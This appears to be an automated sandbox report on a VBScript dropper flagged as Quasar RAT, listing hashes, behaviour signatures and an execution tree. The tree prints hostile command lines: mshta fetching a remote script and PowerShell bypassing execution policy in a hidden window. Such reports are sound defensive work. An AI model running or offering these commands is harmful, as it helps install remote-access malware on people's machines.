Overview

overview

10

Static

static

smokeweed.vbs

windows7_x64

10

smokeweed.vbs

windows10_x64

10

Analysis

  • max time kernel
    64s
  • max time network
    128s
  • platform
    windows10_x64
  • resource
    win10v20201028
  • submitted
    26-02-2021 06:14

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    smokeweed.vbs

  • Size

    3KB

  • MD5

    07b8be238ea7e4d28ab60dd6c485f663

  • SHA1

    73c2226a8592f0a729a837013d40e5b55ecb4415

  • SHA256

    78a881cbc86ce0458d8db0eae0c92a8e016537796ef3ab7928037f4a51d4ca2f

  • SHA512

    9d1bcf4a17c4b7986e2fec74f0d4ba020ea2e4933ff9cad19a639d87f0998a32439a227bcd55bf37d08886276a11ede28f06a60af12b6a368b5cdbd2544cf7a0

Score
10/10
quasarspywaretrojan

Malware Config

Signatures

  • Quasar RAT

    Quasar is an open source Remote Access Tool.

    trojanspywarequasar
  • Blocklisted process makes network request 4 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 24 IoCs
  • Suspicious use of WriteProcessMemory 16 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\smokeweed.vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3248
    • C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\smokeweed.vbs" /elevate
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2160
      • C:\Windows\System32\mshta.exe
        "C:\Windows\System32\mshta.exe" https://z.zz.ht/bBtXS.txt
        3⤵
        • Blocklisted process makes network request
        • Suspicious use of WriteProcessMemory
        PID:3864
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3940
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -command C:\Users\Public\Datax.ps1;
        3⤵
        • Blocklisted process makes network request
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:3892
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"
          4⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:784

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1
T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
    MD5

    2143b379fed61ab5450bab1a751798ce

    SHA1

    32f5b4e8d1387688ee5dec6b3cc6fd27b454f19e

    SHA256

    a2c739624812ada0913f2fbfe13228e7e42a20efdcb6d5c4e111964f9b620f81

    SHA512

    0bc39e3b666fdad76bcf4fe7e7729c9e8441aa2808173efc8030ce07c753cb5f7e25d81dd8ec75e7a5b6324b7504ff461e470023551976a2a6a415d6a4859bfa

    Download Submit
  • C:\Users\Public\Datax.ps1
    MD5

    c85a52e535d54935f25bc43e8b393b1a

    SHA1

    963baebff776005de53b5c68608c5c5205400b50

    SHA256

    0545f59b84c4323711d72e396797694068bd7a56695aea0cdd90352a4a0c7753

    SHA512

    729398ee2dbb41b6f38c106dd3a75fbb695f700b009e6f5267f4242588764a5b3b407b7e2fbb17f9fd4cfc8684e04c39c2e68b6b400de750c2c2c4967d49f184

    Download Submit
  • memory/784-30-0x0000000004F50000-0x0000000004F51000-memory.dmp
    Filesize

    4KB

    Download
  • memory/784-34-0x00000000066F0000-0x00000000066F1000-memory.dmp
    Filesize

    4KB

    Download
  • memory/784-32-0x0000000005FB0000-0x0000000005FB1000-memory.dmp
    Filesize

    4KB

    Download
  • memory/784-31-0x0000000005AA0000-0x0000000005AA1000-memory.dmp
    Filesize

    4KB

    Download
  • memory/784-29-0x0000000004DA0000-0x0000000004DA1000-memory.dmp
    Filesize

    4KB

    Download
  • memory/784-28-0x0000000004DB0000-0x0000000004DB1000-memory.dmp
    Filesize

    4KB

    Download
  • memory/784-27-0x00000000051E0000-0x00000000051E1000-memory.dmp
    Filesize

    4KB

    Download
  • memory/784-24-0x00000000738E0000-0x0000000073FCE000-memory.dmp
    Filesize

    6.9MB

    Download
  • memory/784-23-0x000000000045819E-mapping.dmp
    Download
  • memory/784-22-0x0000000000400000-0x000000000045E000-memory.dmp
    Filesize

    376KB

    Download
  • memory/2160-2-0x0000000000000000-mapping.dmp
    Download
  • memory/3864-3-0x0000000000000000-mapping.dmp
    Download
  • memory/3892-19-0x0000020BF1FE6000-0x0000020BF1FE8000-memory.dmp
    Filesize

    8KB

    Download
  • memory/3892-20-0x0000020BF1FE8000-0x0000020BF1FEA000-memory.dmp
    Filesize

    8KB

    Download
  • memory/3892-21-0x0000020BF2AC0000-0x0000020BF2AC6000-memory.dmp
    Filesize

    24KB

    Download
  • memory/3892-15-0x0000020BF1FE3000-0x0000020BF1FE5000-memory.dmp
    Filesize

    8KB

    Download
  • memory/3892-14-0x0000020BF1FE0000-0x0000020BF1FE2000-memory.dmp
    Filesize

    8KB

    Download
  • memory/3892-12-0x00007FF81D5B0000-0x00007FF81DF9C000-memory.dmp
    Filesize

    9.9MB

    Download
  • memory/3892-11-0x0000000000000000-mapping.dmp
    Download
  • memory/3940-10-0x000001E2FB463000-0x000001E2FB465000-memory.dmp
    Filesize

    8KB

    Download
  • memory/3940-9-0x000001E2FB460000-0x000001E2FB462000-memory.dmp
    Filesize

    8KB

    Download
  • memory/3940-8-0x000001E2FC390000-0x000001E2FC391000-memory.dmp
    Filesize

    4KB

    Download
  • memory/3940-7-0x000001E2FBF40000-0x000001E2FBF41000-memory.dmp
    Filesize

    4KB

    Download
  • memory/3940-6-0x000001E2FB3D0000-0x000001E2FB3D1000-memory.dmp
    Filesize

    4KB

    Download
  • memory/3940-5-0x00007FF81D5B0000-0x00007FF81DF9C000-memory.dmp
    Filesize

    9.9MB

    Download
  • memory/3940-4-0x0000000000000000-mapping.dmp
    Download